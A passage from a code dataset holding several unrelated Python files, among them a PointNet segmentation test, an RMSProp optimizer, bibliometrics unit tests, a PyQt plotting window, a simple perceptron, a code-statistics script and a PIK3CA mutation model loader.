PartDataset\nfrom pointnet import PointNetDenseCls\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom show3d_balls import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batchSize', type=int, default=1, help='input batch size')\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=0)\nparser.add_argument('--nepoch', type=int, default=30, help='number of epochs to train for')\nparser.add_argument('--outf', type=str, default='seg', help='output folder')\nparser.add_argument('--model', type=str, default= './seg/seg_model_29_0.810.pth', help='model path')\n\n\nopt = parser.parse_args()\nprint (opt)\n\nopt.manualSeed = random.randint(1, 2500) # fix seed\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\n\nnum_points = 2700\n\ntest_dataset = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', npoints=num_points, classification=False, class_choice=['tools'], train=False)\ntestdataloader = torch.utils.data.DataLoader(test_dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=int(opt.workers))\nprint(len(test_dataset))\n\nnum_classes = 10\nprint('classes', num_classes)\ntry:\n os.makedirs(opt.outf)\nexcept OSError:\n pass\n\nblue = lambda x:'\\033[94m' + x + '\\033[0m'\n\n\nclassifier = PointNetDenseCls(num_points=num_points, k=num_classes)\nclassifier.load_state_dict(torch.load(opt.model))\n# classifier.cuda()\nclassifier.eval()\n\nnum_test_batch = len(test_dataset)/opt.batchSize\n\ncmap = plt.cm.get_cmap(\"hsv\", 5)\ncmap = np.array([cmap(i) for i in range(10)])[:,:3]\n\ncorrect_percents = []\nfor i, data in enumerate(testdataloader, 0):\n points_np, target = data\n points, target = Variable(points_np), Variable(target)\n points = points.transpose(2, 1)\n # points, target = points.cuda(), target.cuda()\n\n pred, _ = classifier(points)\n pred = pred.view(-1, num_classes)\n target = target.view(-1,1)[:,0] - 1\n\n pred_choice = pred.data.max(1)[1]\n correct = pred_choice.eq(target.data).cpu().sum()\n correct_percent = correct.item()/float(list(target.shape)[0])\n correct_percents.append(correct_percent)\n print('[%d/%d] accuracy: %f' %(i, num_test_batch, correct_percent))\n\n pred_color = cmap[pred_choice.numpy()[0], :]\n showpoints(points_np, None, pred_color, ballradius=4)\naverage_correct_percent = np.sum(correct_percents) / len(correct_percents)\nprint('Average accuracy: %f' % (correct_percent))\n","sub_path":"test_seg.py","file_name":"test_seg.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64609516","text":"import numpy as np\nfrom optimizer.Optimizer import Optimizer\n\n\nclass RmsProp(Optimizer):\n def __init__(self, learning_rate=0.01, decay_rate=0.99):\n self.learning_rate = learning_rate\n self.decay_rate = decay_rate\n self.h = None\n\n def update(self, params, grads):\n if self.h is None:\n self.h = {}\n for key, val in params.items():\n self.h[key] = np.zeros_like(val)\n\n for key in params.keys():\n self.h[key] = self.decay_rate * self.h[key] + (1 - self.decay_rate) * grads[key] * grads[key]\n params[key] -= self.learning_rate * grads[key] / (np.sqrt(self.h[key]) + 1e-7)\n","sub_path":"optimizer/RmsProp.py","file_name":"RmsProp.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"327046041","text":"\"\"\"\nUnit tests for publication_objects.py\n\"\"\"\n\n# pylint: disable=no-member, missing-docstring, len-as-condition\nimport logging\n\nimport pytest\n\nfrom bibliom.publication_objects import Paper, Author, Journal, Citation\nfrom bibliom.dbtable import DBTable\nfrom bibliom import exceptions\n\n@pytest.mark.usefixtures('class_manager')\nclass TestPaper():\n \"\"\"\n Unit tests for Paper class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_init')\n new_paper = Paper(manager=self.manager)\n assert isinstance(new_paper, Paper)\n assert not new_paper.was_retracted\n\n paper_table = DBTable.get_table_object('paper', self.manager)\n new_paper = Paper(table=paper_table)\n assert isinstance(new_paper, Paper)\n assert not new_paper.was_retracted\n\n new_paper = Paper(\n table=paper_table,\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n })\n assert new_paper.title == \"A New Paper\"\n assert new_paper.doi == \"10.1231/12312\"\n\n paper = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '1'\n )\n assert paper.title\n \n def test_fetch(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_fetch')\n paper = Paper.fetch(\n manager=self.manager,\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n paper = Paper.fetch(where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'})\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n paper = Paper.fetch(doi='10.1016/j.ijhydene.2016.06.178')\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n\n def test_str(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_str')\n paper_table = DBTable.get_table_object('paper', self.manager)\n new_paper = Paper(\n table=paper_table,\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n })\n\n assert str(new_paper) == (\n 'A New Paper (10.1231/12312)'\n )\n\n def test_authors(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_authors')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert len(paper.authors) == 2\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.authors) == 0\n\n def test_journal(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_journal')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert paper.journal.title == 'ANTIOXIDANTS & REDOX SIGNALING'\n\n def test_cited_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_cited_papers')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert len(paper.cited_papers) == 177\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.cited_papers) == 0\n\n def test_citing_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_citing_papers')\n paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n assert len(paper.citing_papers) == 5\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.citing_papers) == 0\n\n def test_cite(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_cite')\n source_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n target_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.07.026'}\n )\n new_citation = source_paper.cite(target_paper)\n new_citation.save_to_db()\n\n found = False\n for paper in source_paper.cited_papers:\n if paper.doi == '10.1016/j.ijhydene.2016.07.026':\n found = True\n break\n assert found\n\n found = False\n for paper in target_paper.citing_papers:\n if paper.doi == '10.1016/j.ijhydene.2016.06.178':\n found = True\n break\n assert found\n\n new_paper = Paper()\n with pytest.raises(exceptions.DBUnsyncedError):\n new_paper.cite(target_paper)\n with pytest.raises(exceptions.DBUnsyncedError):\n source_paper.cite(new_paper)\n\n with pytest.raises(TypeError):\n source_paper.cite(\"hello\")\n\n@pytest.mark.usefixtures('class_manager')\nclass TestAuthor():\n \"\"\"\n Unit tests for Author class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_init')\n author_table = DBTable.get_table_object('author', self.manager)\n\n new_author = Author(\n manager=self.manager\n )\n assert isinstance(new_author, Author)\n\n new_author = Author(\n table=author_table\n )\n assert isinstance(new_author, Author)\n\n new_author = Author(\n table=author_table,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Mike'\n }\n )\n assert isinstance(new_author, Author)\n assert new_author.last_name == 'Thicke'\n\n new_author = Author(\n table=author_table,\n row_key='idauthor' + DBTable.KEY_STR_DELIMITER + '1'\n )\n assert isinstance(new_author, Author)\n assert new_author.last_name\n\n def test_str(self):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_str')\n new_author = Author(\n manager=self.manager,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Michael Lowell Ellis'\n }\n )\n assert str(new_author) == 'Thicke, Michael Lowell Ellis'\n\n def test_from_string(self):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_from_string')\n author_table = DBTable.get_table_object('author', self.manager)\n new_author = Author.from_string(author_table, 'Thicke, Michael Lowell Ellis')\n assert new_author.last_name == 'Thicke'\n assert new_author.given_names == 'Michael Lowell Ellis'\n\n new_author = Author.from_string(author_table, 'IPCC')\n assert new_author.corporate\n assert new_author.last_name == 'IPCC'\n\n def test_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_papers')\n author_table = DBTable.get_table_object('author', self.manager)\n\n author = Author(\n table=author_table,\n row_key='idauthor' + author_table.KEY_STR_DELIMITER + '1'\n )\n assert len(author.papers) == 1\n\n new_author = Author(\n manager=self.manager,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Michael Lowell Ellis'\n }\n )\n assert len(new_author.papers) == 0\n\n@pytest.mark.usefixtures('class_manager')\nclass TestJournal():\n \"\"\"\n Unit tests for Journal class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestJournal.test_init')\n journal_table = DBTable.get_table_object('journal', self.manager)\n\n journal = Journal(manager=self.manager)\n assert isinstance(journal, Journal)\n\n journal = Journal(table=journal_table)\n assert isinstance(journal, Journal)\n\n journal = Journal(\n table=journal_table,\n row_key='idjournal' + journal_table.KEY_STR_DELIMITER + '1')\n assert isinstance(journal, Journal)\n assert isinstance(journal.title, str)\n\n new_journal = Journal(\n table=journal_table,\n fields_dict={\n 'title': 'A Journal'\n }\n )\n assert new_journal.title == 'A Journal'\n\n def test_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestJournal.test_papers')\n journal_table = DBTable.get_table_object('journal', self.manager)\n\n journal = Journal.fetch(\n table=journal_table,\n where_dict={\n 'issn': '1876-6102'\n }\n )\n assert len(journal.papers) == 148\n\n@pytest.mark.usefixtures('class_manager')\nclass TestCitation():\n \"\"\"\n Unit tests for Citation class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_init')\n citation_table = DBTable.get_table_object('citation', self.manager)\n\n citation = Citation(table=citation_table)\n assert isinstance(citation, Citation)\n\n citation = Citation(manager=self.manager)\n assert isinstance(citation, Citation)\n\n citation = Citation(\n table=citation_table,\n row_key=('source_id' +\n citation_table.KEY_STR_DELIMITER +\n 'target_id' +\n citation_table.KEY_STR_DELIMITER +\n '68' +\n citation_table.KEY_STR_DELIMITER +\n '75')\n )\n assert isinstance(citation, Citation)\n\n new_citation = Citation(\n table=citation_table,\n fields_dict={\n 'source_id': 100,\n 'target_id': 200\n }\n )\n assert isinstance(new_citation, Citation)\n assert new_citation.source_id == 100\n assert new_citation.target_id == 200\n\n def test_cite(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_cite')\n citation_table = DBTable.get_table_object('citation', self.manager)\n\n source_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n target_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.07.026'}\n )\n\n new_citation = Citation(table=citation_table)\n new_citation.cite(source_paper, target_paper)\n assert new_citation.source_id == source_paper.idpaper\n assert new_citation.target_id == target_paper.idpaper\n\n def test_source_paper_target_paper(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_source_paper_target_paper')\n citation_table = DBTable.get_table_object('citation', self.manager)\n paper_table = DBTable.get_table_object( 'paper', self.manager)\n\n citation = Citation(\n table=citation_table,\n row_key=('source_id' +\n citation_table.KEY_STR_DELIMITER +\n 'target_id' +\n citation_table.KEY_STR_DELIMITER +\n '68' +\n citation_table.KEY_STR_DELIMITER +\n '75')\n )\n source_paper = citation.source_paper\n assert source_paper.idpaper == 68\n assert source_paper.doi == '10.1140/epja/i2017-12405-4'\n target_paper = citation.target_paper\n assert target_paper.idpaper == 75\n assert target_paper.doi == '10.1088/1674-1137/41/11/113104'\n\n paper_1 = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '1'\n )\n paper_2 = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '2'\n )\n citation = Citation(table=citation_table)\n citation.source_paper = paper_1\n citation.target_paper = paper_2\n assert citation.source_id == 1\n assert citation.target_id == 2\n citation.save_to_db()\n assert paper_2 in paper_1.cited_papers\n assert paper_1 in paper_2.citing_papers\n","sub_path":"tests/test_publication_objects.py","file_name":"test_publication_objects.py","file_ext":"py","file_size_in_byte":13039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107337914","text":"import numpy as np\nimport pandas as pd\n\nclass MEnsamble:\n def __init__(self, Model, n, ws, bins, **kwparams):\n self.n = kwparams.get('n', n)\n self.Model = kwparams.get('Model', Model)\n self.ms = None\n self.idxs = None\n self.__updateN__(**kwparams)\n self.ws = kwparams.get('ws', ws)\n self.bins = kwparams.get('bins', bins)\n\n def __updateN__(self, **kwparams):\n self.ms = [self.Model(**kwparams) for i in range(self.n)]\n self.idxs = [[] for i in range(self.n)]\n\n def splitDataset(self, y):\n bres = [(y > (self.bins[i] - 1e-10)) & (y <= self.bins[i + 1]) for i in range(len(bins) - 1)]\n for i in range(self.n):\n res = []\n for j, w in enumerate(self.ws):\n res.append(np.random.choice(\n np.where(bres[j])[0],\n np.min([w, bres[j].sum()]),\n replace=False))\n # print(bres[j].sum(),w,len(res[-1]))\n self.idxs[i] = np.hstack(res)\n\n def fit(self, X, y, splitDataset=True):\n self.splitDataset(y)\n for m, idx in zip(self.ms, self.idxs):\n m.fit(X[idx], y[idx])\n\n def predict(self, X):\n yp = [m.predict(X) for m in self.ms]\n return np.median(yp, axis=0)\n\n def set_params(self, **params):\n m_keys = {}\n for p in params:\n assert not (hasattr(self, p) and hasattr(self.ms[0], p))\n if hasattr(self, p):\n self.__setattr__(p, params[p])\n if p == 'n':\n self.__updateN__()\n else:\n m_keys[p] = params[p]\n for m in self.ms:\n m.set_params(**m_keys)\n\n\nclass Model_Wrapper(object):\n def __init__(self, model, columns, X_scaler, Y_scaler):\n self.model = model\n self.columns = columns\n\n self.X_scaler = X_scaler\n\n self.Y_scaler = Y_scaler\n\n def predict(self, X):\n X = X[self.columns]\n\n Xs = self.X_scaler.transform(X)\n yp = self.model.predict(Xs)\n\n ys = self.Y_scaler.transform(yp)\n y = pd.DataFrame(ys)\n return y\n\n\nclass NoScale:\n def transform(self, x, *args, **kwargs):\n return x","sub_path":"aux/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"228336527","text":"from PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QMainWindow, QDockWidget, QTabWidget\nfrom ert_gui.models.connectors.init import CaseSelectorModel\nfrom ert_gui.tools.plot import PlotPanel, DataTypeKeysWidget, CaseSelectionWidget, PlotMetricsWidget, ScaleTracker\nfrom ert_gui.tools.plot.data import PlotDataFetcher\nfrom ert_gui.widgets.util import may_take_a_long_time\n\n\nclass PlotWindow(QMainWindow):\n def __init__(self, parent):\n QMainWindow.__init__(self, parent)\n\n self.setMinimumWidth(750)\n self.setMinimumHeight(500)\n\n self.setWindowTitle(\"Plotting\")\n self.activateWindow()\n\n self.__central_tab = QTabWidget()\n self.setCentralWidget(self.__central_tab)\n\n\n self.__plot_panels = []\n\n self.addPlotPanel(\"Ensemble plot\", \"gui/plots/simple_plot.html\", short_name=\"Plot\")\n self.addPlotPanel(\"Ensemble overview plot\", \"gui/plots/simple_overview_plot.html\", short_name=\"oPlot\")\n self.addPlotPanel(\"Histogram\", \"gui/plots/histogram.html\", short_name=\"Histogram\")\n self.addPlotPanel(\"RFT plot\", \"gui/plots/rft.html\", short_name=\"RFT\")\n self.addPlotPanel(\"RFT overview plot\", \"gui/plots/rft_overview.html\", short_name=\"oRFT\")\n\n self.__data_type_keys_widget = DataTypeKeysWidget()\n self.__data_type_keys_widget.dataTypeKeySelected.connect(self.keySelected)\n self.addDock(\"Data types\", self.__data_type_keys_widget)\n\n current_case = CaseSelectorModel().getCurrentChoice()\n self.__case_selection_widget = CaseSelectionWidget(current_case)\n self.__case_selection_widget.caseSelectionChanged.connect(self.caseSelectionChanged)\n self.addDock(\"Plot case\", self.__case_selection_widget)\n\n self.__plot_metrics_widget = PlotMetricsWidget()\n self.__plot_metrics_widget.plotScalesChanged.connect(self.scalesChanged)\n self.__plot_metrics_widget.reportStepTimeChanged.connect(self.reportStepTimeChanged)\n self.addDock(\"Plot metrics\", self.__plot_metrics_widget)\n\n self.__data_type_key = None\n self.__plot_cases = self.__case_selection_widget.getPlotCaseNames()\n self.__value_scale_tracker = ScaleTracker(\"Value\")\n self.__time_scale_tracker = ScaleTracker(\"Time\")\n self.__depth_scale_tracker = ScaleTracker(\"Depth\")\n\n\n def addPlotPanel(self, name, path, short_name=None):\n if short_name is None:\n short_name = name\n\n plot_panel = PlotPanel(name, short_name, path)\n plot_panel.plotReady.connect(self.plotReady)\n self.__plot_panels.append(plot_panel)\n self.__central_tab.addTab(plot_panel, name)\n\n\n def addDock(self, name, widget, area=Qt.LeftDockWidgetArea, allowed_areas=Qt.AllDockWidgetAreas):\n dock_widget = QDockWidget(name)\n dock_widget.setObjectName(\"%sDock\" % name)\n dock_widget.setWidget(widget)\n dock_widget.setAllowedAreas(allowed_areas)\n dock_widget.setFeatures(QDockWidget.DockWidgetFloatable | QDockWidget.DockWidgetMovable)\n\n self.addDockWidget(area, dock_widget)\n return dock_widget\n\n\n def checkPlotStatus(self):\n for plot_panel in self.__plot_panels:\n if not plot_panel.isReady():\n return False\n\n if len(self.__plot_cases) == 0:\n return False\n\n return True\n\n def plotReady(self):\n if self.checkPlotStatus():\n self.__data_type_keys_widget.selectDefault()\n\n\n def caseSelectionChanged(self):\n self.__plot_cases = self.__case_selection_widget.getPlotCaseNames()\n self.keySelected(self.__data_type_key)\n\n def scalesChanged(self):\n value_min = self.__plot_metrics_widget.getValueMin()\n value_max = self.__plot_metrics_widget.getValueMax()\n time_min = self.__plot_metrics_widget.getTimeMin()\n time_max = self.__plot_metrics_widget.getTimeMax()\n depth_min = self.__plot_metrics_widget.getDepthMin()\n depth_max = self.__plot_metrics_widget.getDepthMax()\n\n self.__value_scale_tracker.setScaleValues(self.__data_type_key, value_min, value_max)\n self.__time_scale_tracker.setScaleValues(self.__data_type_key, time_min, time_max)\n self.__depth_scale_tracker.setScaleValues(self.__data_type_key, depth_min, depth_max)\n\n\n for plot_panel in self.__plot_panels:\n plot_panel.setScales(time_min, time_max, value_min, value_max, depth_min, depth_max)\n\n\n def reportStepTimeChanged(self):\n t = self.__plot_metrics_widget.getSelectedReportStepTime()\n\n for plot_panel in self.__plot_panels:\n plot_panel.setReportStepTime(t)\n\n\n def showOrHidePlotTab(self, plot_panel, is_visible, show_plot):\n plot_panel.setPlotIsVisible(show_plot)\n if show_plot and not is_visible:\n index = self.__plot_panels.index(plot_panel)\n self.__central_tab.insertTab(index, plot_panel, plot_panel.getName())\n elif not show_plot and is_visible:\n index = self.__central_tab.indexOf(plot_panel)\n self.__central_tab.removeTab(index)\n\n @may_take_a_long_time\n def keySelected(self, key):\n self.__data_type_key = str(key)\n\n plot_data_fetcher = PlotDataFetcher()\n for plot_panel in self.__plot_panels:\n visible = self.__central_tab.indexOf(plot_panel) > -1\n\n if plot_data_fetcher.isSummaryKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(time=True, value=True, histogram=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isBlockObservationKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(depth=True, value=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isGenKWKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(histogram=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isGenDataKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(time=True, value=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n else:\n raise NotImplementedError(\"Key %s not supported.\" % self.__data_type_key)\n\n value_min = self.__value_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n value_max = self.__value_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n time_min = self.__time_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n time_max = self.__time_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n depth_min = self.__depth_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n depth_max = self.__depth_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n\n self.__plot_metrics_widget.updateScales(time_min, time_max, value_min, value_max, depth_min, depth_max)\n\n\n if self.checkPlotStatus():\n data = plot_data_fetcher.getPlotDataForKeyAndCases(self.__data_type_key, self.__plot_cases)\n data.setParent(self)\n\n for plot_panel in self.__plot_panels:\n plot_panel.setPlotData(data)\n\n","sub_path":"devel/python/python/ert_gui/tools/plot/plot_window.py","file_name":"plot_window.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"278187008","text":"from func import *\n\n\nclass Perceptron:\n def __init__(self, length, i=0, h=0.75):\n self.h = h # Сдвиг\n self.i = i # Храним порядковый номер персептрона\n self.weight = init_weight(length) # Инициализируем веса для текущего персептрона\n\n # Функция обучения\n def train(self, X, number, epochs=1, n=1):\n target = read_target(number) # Читаем данные, которые мы хотим получить от текущего персептрона\n for epoch in range(epochs): # Пробегаем по каждой эпохе\n net_y = net(X, self.weight) + ((-1) * self.h) # Суммируем произведения Xi*Wi\n z = activation_fun(net_y, self.h) # Предсказание персептрона (ступенчатая функция)\n err = target[self.i] - z # Получаем ошибку\n for i in range(len(self.weight)): # Пробегаем по всем весам и подстраиваем их\n self.weight[i] += err * X[i] * n\n self.h += err * (-1) * n # Также подстроим сдвиг\n\n # Функция получаения ответа\n def get_answer(self, X):\n net_y = net(X, self.weight) - self.h # Суммируем произведения Xi*Wi\n z = activation_fun(net_y, self.h) # Предсказание персептрона (ступенчатая функция)\n return z\n","sub_path":"lab_1/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"513677678","text":"# #SUMMARY\r\n# Napisz program, który odczytuje wszystkie pliki stworzone przez Ciebie podczas\r\n# feriechallenge - przeszukuje lokalne katalogi lub łączy się w tym celu z Githubem.\r\n# Postaraj się jak najmniej hardcodować i na przykład nie podawaj listy wszystkich plików ręcznie\r\n# Następnie wykorzystując swój sposób katalogowania programów automat odczytuje\r\n# i wyświetla takie informacje:\r\n# - do ilu zadań z 10 napisało się kod\r\n# - liczba linijek kodu napisanych w każdym zadaniu (bez uwzględniania pustych!)\r\n# oraz sumaryczna liczba linijek\r\n# - liczba unikalnych słów użytych we wszystkich programach oraz najczęściej występujące słowo\r\n# - lista i liczba słów kluczowych użyta podczas ca��ego challenge (wykorzystaj moduł keywords)\r\n# - lista i liczba zaimportowanych modułów we wszystkich programach\r\n# Propozycja rozszerzenia: Po prostu miej odwagę i pochwal się outputem swojego programu!\r\n# - opublikuj posta z tagiem #feriechallenge i zostaw lajka na naszej stronie,\r\n# będzie nam miło 🙂 Możesz też oczywiście umieścić jakieś dodatkowe statystyki.\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport keyword\r\n\r\nglobal_content = []\r\n\r\n\r\ndef filtered_code(content):\r\n filtered = []\r\n for line in content:\r\n if str(line).startswith('#'):\r\n continue\r\n if len(line) < 2:\r\n continue\r\n else:\r\n filtered.append(line.strip())\r\n return filtered\r\n\r\n\r\ndef word_count(content):\r\n wordsAndCount = {}\r\n \r\n for line in content:\r\n words_list = str(line).split()\r\n for word in words_list:\r\n wordd = word.strip(\"[](),.+-//='\")\r\n if wordd.isalpha():\r\n try:\r\n wordsAndCount[wordd] += 1\r\n except KeyError:\r\n wordsAndCount[wordd] = 1\r\n else:\r\n continue\r\n return wordsAndCount\r\n\r\n\r\ndef key_word_count(content):\r\n keyWordsCount = {}\r\n \r\n for line in content:\r\n words_list = str(line).split()\r\n for word in words_list:\r\n wordd = word.strip(\"[](),.+-=//'\")\r\n if keyword.iskeyword(wordd):\r\n try:\r\n keyWordsCount[wordd] += 1\r\n except KeyError:\r\n keyWordsCount[wordd] = 1\r\n else:\r\n continue\r\n\r\n return keyWordsCount\r\n\r\ndef imported_modules(content):\r\n importedModules={}\r\n for lines in content:\r\n for line in lines:\r\n if str(line).startswith('import'):\r\n word = line[7:]\r\n try:\r\n importedModules[word] += 1\r\n except KeyError:\r\n importedModules[word] = 1\r\n if str(line).startswith('from'):\r\n word = line[5:str(line).index('import')-1]\r\n try:\r\n importedModules[word] += 1\r\n except KeyError:\r\n importedModules[word] = 1\r\n else:\r\n continue\r\n return importedModules\r\n \r\nbaseDir = 'C:\\\\Projects\\\\Python\\\\HardCode\\\\scripts\\\\'\r\nonlyfiles = [f for f in listdir(baseDir) if isfile(join(baseDir, f)) if f.upper().endswith('.PY')]\r\ni = 0\r\nsummaryLine = 0\r\nsummaryLineCode = 0\r\n\r\nfor file in onlyfiles:\r\n i += 1\r\n print('\\n', '-'*10, i, file, '-'*10)\r\n with open(baseDir+file, \"r\") as file:\r\n content = file.readlines()\r\n summaryLine += len(content)\r\n print(len(content), ': number of lines')\r\n filtered = filtered_code(content)\r\n summaryLineCode += len(filtered)\r\n print(len(filtered), ': number of code lines', '\\n', '-'*40)\r\n global_content.append(filtered)\r\n \r\nwords = word_count(global_content)\r\nmodules = imported_modules(global_content)\r\ninverse = {value: key for key, value in words.items()}\r\n\r\nprint('imported modules:', modules)\r\nprint ('keywords: ',key_word_count(global_content))\r\nprint('-'*10)\r\nprint('summary lines = ', summaryLine)\r\nprint('summary lines code = ', summaryLineCode)\r\nprint('Unique words in file: ', len(words))\r\nprint('max counted word: ', inverse[max(inverse.keys())],'-',max(inverse.keys()))\r\nprint('Imports count:', words['import'])\r\n","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"168242334","text":"import os\nimport json\nimport numpy as np\nimport random\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import models, transforms\n\nfrom PIK3CA_mutation.data_reader import ClsDataset\nfrom PIK3CA_mutation.utils import get_modelpath, net_prediction_oneshop, patient_res_m3_oneshop, save_results\n\n\ndef start_model(datapath, sampling_file, root_dir, model_type, seed=2020, gpu=\"0\", net=\"resnet18\",\n num_classes=2, num_workers=4, batch_size=256, norm_mean=[0.8201, 0.5207, 0.7189],\n norm_std=[0.1526, 0.1542, 0.1183]):\n \"\"\"\n Arguments:\n model_type: 'PIK3CA_Mutation', 'BLIS', 'IM', 'LAR', 'MES'\n net: resnet18, alexnet, resnet34, inception_v3\n\n Results:\n root_dir: ./FUSCC001_models/\n patch.json: ${root_dir}/${model_type}/patch.json\n patch.npz: ${root_dir}/${model_type}/patch.npz\n patient.json: ${root_dir}/${model_type}/patient.json\n patient.npz: ${root_dir}/${model_type}/patient.npz\n \"\"\"\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n preprocess = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.ToTensor(), # Operated on original image, rewrite on previous transform.\n transforms.Normalize(norm_mean, norm_std)])\n\n print('Loading data...')\n testset = ClsDataset(sampling_file, datapath, preprocess)\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=num_workers)\n\n net = getattr(models, net)(pretrained=False, num_classes=num_classes)\n modelpath = get_modelpath(model_type)\n print('Loading model...', modelpath)\n\n if len(gpu) > 1:\n net = torch.nn.DataParallel(net).cuda()\n net.load_state_dict(torch.load(modelpath)) # load the finetune weight parameters\n else:\n net = net.cuda()\n net.load_state_dict({k.replace('module.',''):v for k,v in torch.load(modelpath).items()})\n\n # Patch Output: patch.json / patch.npz\n scores_patch, predictions_patch, namelist_patch = net_prediction_oneshop(testloader, net, num_classes)\n\n patch_results = save_results(namelist_patch, scores_patch[:, 1], predictions_patch, num_classes)\n with open(os.path.join(root_dir, model_type, 'patch.json'), 'w') as f:\n json.dump(patch_results, f)\n\n savename_patch = os.path.join(root_dir, model_type, 'patch.npz')\n np.savez(savename_patch, key_score=scores_patch, key_binpred=predictions_patch, key_namelist=namelist_patch)\n\n # Patient Output: patient.json / patient.npz\n scores_patient, 